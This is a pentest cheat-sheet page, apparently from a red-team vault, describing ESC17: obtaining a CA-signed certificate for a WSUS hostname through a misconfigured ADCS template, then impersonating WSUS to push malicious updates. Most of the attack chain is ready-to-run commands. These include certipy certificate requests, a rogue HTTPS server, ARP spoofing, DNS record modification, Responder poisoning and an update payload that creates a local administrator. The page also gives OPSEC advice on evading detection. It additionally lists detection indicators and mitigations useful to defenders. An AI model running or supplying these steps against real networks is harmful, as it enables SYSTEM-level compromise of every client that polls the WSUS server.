esc17-adcs-certificate-spoofing-to-attack-https-enabled-wsus-clients.md (12435B)
1 --- 2 title: "ESC17 — ADCS Certificate Spoofing to Attack HTTPS-Enabled WSUS Clients" 3 description: "ESC17 was coined by researchers Alexander Neff and Phil Knüfer at DigiTrace in January 2026. Unlike ESC1–ESC16 which target domain privilege escalation…" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "privilege-escalation", "lateral-movement"] 7 tools: ["NetExec", "Impacket", "Certipy", "Responder", "OpenSSL"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/ESC17 — ADCS Certificate Spoofing to Attack HTTPS-Enabled WSUS Clients.md" 11 --- 12 # ESC17 — ADCS Certificate Spoofing to Attack HTTPS-Enabled WSUS Clients 13 14 ## Quick Reference 15 16 | Field | Value | 17 |-------|-------| 18 | **Category** | Lateral Movement / Client Compromise | 19 | **Difficulty** | High | 20 | **Pre-requisites** | Template with Server Auth EKU + `ENROLLEE_SUPPLIES_SUBJECT` + WSUS deployed + MiTM capability | 21 | **Tools** | Certipy, PyWSUS, Responder, dnstool.py | 22 | **OPSEC Noise** | Medium-High — cert request + network-level MiTM | 23 | **One-liner** | Request CA-signed TLS cert for WSUS hostname via misconfigured template → MiTM WSUS traffic → serve malicious updates → SYSTEM on all clients. | 24 25 *** 26 27 ## What Is ESC17? 28 29 ESC17 was coined by researchers **Alexander Neff and Phil Knüfer** at DigiTrace in January 2026. Unlike ESC1–ESC16 which target **domain privilege escalation**, ESC17 targets **lateral movement and client compromise** by weaponising misconfigured ADCS templates to **impersonate a WSUS (Windows Server Update Services) server** — even when WSUS is secured with HTTPS. 30 31 The common belief was that enabling HTTPS on WSUS made it immune to spoofing and interception attacks. ESC17 shatters that assumption entirely. If an ADCS template permits low-privileged users to enroll and specify their own SAN, and that template has **Server Authentication EKU** — an attacker can request a **legitimate, CA-signed TLS certificate for the WSUS server's hostname**. With a trusted cert in hand they can MiTM the WSUS traffic, serve malicious updates, and achieve **SYSTEM-level code execution on every domain-joined client that polls that WSUS server**. 32 33 *** 34 35 ## ESC17 vs ESC1 — The Critical Distinction 36 37 ESC17 is essentially an **incomplete mitigation of ESC1**. Many organisations hardened ESC1 by removing `Client Authentication` EKU from permissive templates — but left `Server Authentication` EKU in place, not realising it opens a completely different attack surface: 38 39 | | ESC1 | ESC17 | 40 |---|---|---| 41 | **EKU abused** | `Client Authentication` (1.3.6.1.5.5.7.3.2) | **`Server Authentication` (1.3.6.1.5.5.7.3.1)** | 42 | **What you forge** | Identity as a domain user | **Identity as a server (e.g. WSUS)** | 43 | **Attack outcome** | Authenticate as Administrator → Domain Admin | **Impersonate WSUS → push malicious updates → SYSTEM on all clients** | 44 | **ESC1 mitigation blocks it?** | N/A | ❌ Removing Client Auth EKU does NOT fix it | 45 | **Requires HTTPS?** | N/A | ❌ Bypasses HTTPS entirely | 46 | **Target** | AD authentication | **Windows Update clients** | 47 48 *** 49 50 ## Required Conditions 51 52 | Condition | Notes | 53 |-----------|-------| 54 | Certificate template has **`Server Authentication` EKU** | OID `1.3.6.1.5.5.7.3.1` | 55 | Template has **`ENROLLEE_SUPPLIES_SUBJECT`** (SAN control) | Same flag as ESC1 — `Enrollee Supplies Subject: True` | 56 | Low-priv users can enroll | `Enrollment Rights: Domain Users` or similar | 57 | WSUS is deployed in the environment | Required target for the impersonation | 58 | Attacker can intercept or redirect WSUS traffic | ARP poisoning, DNS manipulation, BGP — any MiTM method | 59 60 > 💡 ESC17 can also be combined with **weak DNS ACL permissions** — if a low-priv user can also modify AD-integrated DNS records, they can redirect WSUS hostname resolution to their machine without needing any network-level MiTM. DNS ACL abuse + ESC17 is a particularly clean attack chain. 61 62 *** 63 64 ## Understanding the WSUS Attack Context 65 66 Before diving into the exploit chain, understand the target: 67 68 ``` 69 Normal WSUS flow: 70 [Domain Client] ──── HTTPS ────► [WSUS Server wsus.domain.htb] 71 Validates TLS cert of WSUS server 72 Downloads + installs updates (runs as SYSTEM) 73 74 ESC17 abuse flow: 75 [Attacker] requests cert for wsus.domain.htb via misconfigured template 76 [Attacker box] presents valid TLS cert for wsus.domain.htb ← CA-signed 77 [Domain Client] trusts the cert ← same CA they always trusted 78 [Domain Client] ──── HTTPS ────► [Attacker box pretending to be WSUS] 79 Receives malicious update package 80 Executes as SYSTEM ← Game over 81 ``` 82 83 *** 84 85 ## Full Attack Chain 86 87 ### Step 1 — Enumerate Vulnerable Templates 88 89 ```bash 90 # Look for templates with Server Authentication EKU + Enrollee Supplies Subject 91 certipy-ad find -u 'lowpriv@domain.htb' -p 'Password123!' \ 92 -dc-ip $TARGET -vulnerable -stdout 93 94 # Manually grep if needed — Server Auth OID is 1.3.6.1.5.5.7.3.1 95 # Look for this pattern in certipy output: 96 # Extended Key Usage : Server Authentication ← Target EKU 97 # Enrollee Supplies Subject : True ← SAN control 98 # Enrollment Rights : DOMAIN\Domain Users ← Low-priv enroll 99 ``` 100 101 ### Step 2 — Identify the WSUS Server Hostname 102 103 ```bash 104 # Query AD for WSUS server hostname via WUA (Windows Update Agent) settings 105 netexec ldap $TARGET -u 'lowpriv' -p 'Password123!' \ 106 -M get-desc-users 107 108 # Or check via registry (if you have a foothold on a client) 109 reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v WUServer 110 111 # Typical output: 112 # WUServer = https://wsus.domain.htb:8531 113 ``` 114 115 ### Step 3 — Request a Certificate for the WSUS Server Hostname 116 117 Use the `-dns` flag instead of `-upn` — because this is a Server Authentication cert, the identity is embedded as a DNS SAN, not a UPN: 118 119 ```bash 120 certipy-ad req \ 121 -u 'lowpriv@domain.htb' \ 122 -p 'Password123!' \ 123 -dc-ip $TARGET \ 124 -ca 'DOMAIN-CA-NAME' \ 125 -template 'VulnServerAuthTemplate' \ 126 -dns 'wsus.domain.htb' 127 128 # Output: wsus.pfx 129 # Certificate contains DNS SAN = wsus.domain.htb 130 # Signed by the domain CA — clients will trust it 131 ``` 132 133 ### Step 4 — Set Up a Rogue WSUS Server 134 135 ```bash 136 # Use PWSHark or a custom HTTPS server with your cert 137 # The simplest approach — Python HTTPS server with the cert 138 139 openssl pkcs12 -in wsus.pfx -out wsus.pem -nodes 140 # Split into cert.pem and key.pem then: 141 142 python3 -c " 143 import ssl, http.server 144 context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) 145 context.load_cert_chain('wsus.pem') 146 httpd = http.server.HTTPServer(('0.0.0.0', 8531), http.server.BaseHTTPRequestHandler) 147 httpd.socket = context.wrap_socket(httpd.socket, server_side=True) 148 httpd.serve_forever() 149 " 150 151 # More practically — use PyWSUS or a dedicated WSUS spoofing tool 152 # to serve malicious Windows Update packages 153 ``` 154 155 ### Step 5 — Redirect WSUS Traffic to Your Box 156 157 **Option A — ARP Poisoning (LAN access):** 158 ```bash 159 arpspoof -i eth0 -t <CLIENT-IP> <WSUS-IP> 160 arpspoof -i eth0 -t <WSUS-IP> <CLIENT-IP> 161 ``` 162 163 **Option B — DNS Record Manipulation (if you have DNS write ACLs):** 164 ```bash 165 # If you have WriteProperty on the DNS zone (common misconfiguration) 166 # Update the WSUS A record to point to your IP 167 impacket-adidnsdump -u 'domain.htb\lowpriv' -p 'Password123!' $TARGET 168 # Then modify the WSUS record with dnstool.py or adidnsdump 169 python3 dnstool.py \ 170 -u 'domain.htb\lowpriv' \ 171 -p 'Password123!' \ 172 --action modify \ 173 --record wsus \ 174 --data <YOUR-IP> \ 175 $TARGET 176 ``` 177 178 **Option C — Responder DNS poisoning (if clients query via broadcast):** 179 ```bash 180 responder -I eth0 -A # Analyse mode first to see queries 181 responder -I eth0 # Then active to poison 182 ``` 183 184 ### Step 6 — Serve Malicious Update and Get SYSTEM 185 186 ```bash 187 # When a client polls your rogue WSUS server over HTTPS with your 188 # legitimate CA-signed cert, it accepts the connection and downloads 189 # whatever update package you serve. 190 # Windows Update runs packages as SYSTEM. 191 192 # Using PyWSUS for update spoofing: 193 # https://github.com/GoSecure/pywsus 194 python3 wsus-inject.py \ 195 --host 0.0.0.0 \ 196 --port 8531 \ 197 --cert wsus.pem \ 198 --payload 'cmd.exe /c net user hacker Password123! /add && net localgroup administrators hacker /add' 199 200 # Every domain-joined client polling this WSUS = SYSTEM shell 201 ``` 202 203 *** 204 205 ## ESC17 + Weak DNS ACLs — The Clean Chain 206 207 The most powerful ESC17 scenario discovered by Mustafa Durukan combines ESC17 with DNS ACL abuse: 208 209 ``` 210 [lowpriv@domain.htb] 211 │ 212 ├── WriteProperty on DNS Zone object (common misconfiguration) 213 │ Modify WSUS A record → point to YOUR-IP 214 │ 215 └── Enroll in Server Auth + Enrollee Supplies Subject template 216 Request cert for wsus.domain.htb 217 Serve rogue WSUS over HTTPS with valid cert 218 │ 219 ▼ 220 [All WSUS clients redirected + TLS trusted] 221 │ 222 ▼ 223 [Malicious update pushed → SYSTEM on every client] 224 ``` 225 226 No ARP spoofing. No network-level MiTM. Just two AD misconfigurations chained together. 227 228 *** 229 230 ## ESC17 Real-World Significance 231 232 In my opinion, ESC17 is one of the more impactful recent ADCS discoveries precisely because it **exploits defensive blind spots**. Defenders who specifically hardened ESC1 by removing `Client Authentication` EKU may have created a false sense of security — leaving `Server Authentication` wide open. It also targets **client machines at scale** rather than just domain admins, meaning a successful ESC17 attack could compromise every endpoint in the organisation simultaneously. 233 234 *** 235 236 ## Detection Indicators 237 238 - **Event ID 4887** — Certificate issued with a DNS SAN matching an internal server hostname (e.g. `wsus.domain.htb`) where the requester is a low-priv user account 239 - **DNS audit logs** — Unexpected modification of WSUS or critical server DNS records 240 - **WSUS client logs** — Clients connecting to a WSUS IP that doesn't match the known WSUS server IP 241 - **Certificate Transparency monitoring** — Any cert issued for internal hostnames like `wsus.domain.htb` should alert immediately 242 - **Network IDS** — HTTPS connections to WSUS port (8530/8531) from non-WSUS IPs 243 244 *** 245 246 ## Mitigation 247 248 - **Remove `Server Authentication` EKU** from any template that also has `ENROLLEE_SUPPLIES_SUBJECT` — this is the direct fix 249 - **Restrict enrollment rights** — templates with Server Auth EKU should never be enrollable by `Domain Users` 250 - **Pin WSUS server certificate** via Group Policy — configure clients to only trust a specific certificate thumbprint for WSUS connections 251 - **Audit DNS ACLs** — remove unnecessary `WriteProperty` permissions from AD-integrated DNS zones 252 - **WSUS over HTTPS alone is not sufficient** — implement certificate pinning OR restrict which certificates clients accept for WSUS communication 253 - **Run `certipy find -vulnerable`** and specifically look for templates with `Server Authentication` EKU + `Enrollee Supplies Subject: True` — this combination is ESC17 254 255 *** 256 257 ## OPSEC Considerations 258 259 | Action | Event Generated | Noise Level | 260 |--------|----------------|-------------| 261 | Certificate request with DNS SAN | Event ID 4887 on CA | 🟡 Medium | 262 | ARP poisoning for MiTM | Network IDS alerts | 🔴 High | 263 | DNS record modification | DNS audit logs | 🟡 Medium | 264 | Rogue WSUS server operation | Client WSUS logs, network anomalies | 🔴 High | 265 | Malicious update execution | Sysmon, EDR process creation | 🔴 High | 266 267 > ⚠️ ESC17 is a **high-noise** attack due to the network-level MiTM component. The DNS manipulation variant is cleaner but still generates audit logs. Best suited for environments with limited network monitoring. 268 269 *** 270 271 ## References 272 273 - [Using ADCS to Attack HTTPS-Enabled WSUS Clients — DigiTrace](https://blog.digitrace.de/2026/01/using-adcs-to-attack-https-enabled-wsus-clients/) 274 - [ADCS Misconfig & Weak DNS ACLs Compromise WSUS Clients — Mustafa Durukan](https://www.linkedin.com/posts/mustafa-durukan_esc17-from-adcs-misconfiguration-to-wsus-activity-7432130640709357568-d9CE) 275 - [AD CS Security: Understanding and Exploiting ESC Techniques — Vaadata](https://www.vaadata.com/blog/ad-cs-security-understanding-and-exploiting-esc-techniques/) 276 - [Active Directory Certificate ESC Attacks — InternalAllTheThings](/internal/active-directory/ad-adcs-esc)